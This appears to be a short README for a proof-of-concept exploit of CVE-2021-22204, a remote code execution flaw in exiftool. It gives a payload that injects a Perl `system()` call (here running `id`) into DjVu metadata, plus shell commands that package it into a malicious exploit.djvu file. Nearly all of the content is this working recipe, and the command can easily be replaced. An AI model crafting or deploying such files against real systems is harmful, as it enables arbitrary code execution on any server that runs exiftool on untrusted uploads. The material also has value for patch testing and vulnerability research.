13 lines
346 B
Markdown
13 lines
346 B
Markdown
# CVE-2021-22204
|
|
|
|
* Craft an a payload and execute it via exiftool
|
|
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
|
|
|
|
## Usage
|
|
* Payload is `(metadata "\c${system('id')};")`
|
|
```sh
|
|
sudo apt install djvulibre-bin
|
|
bzz payload payload.bzz
|
|
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
|
|
```
|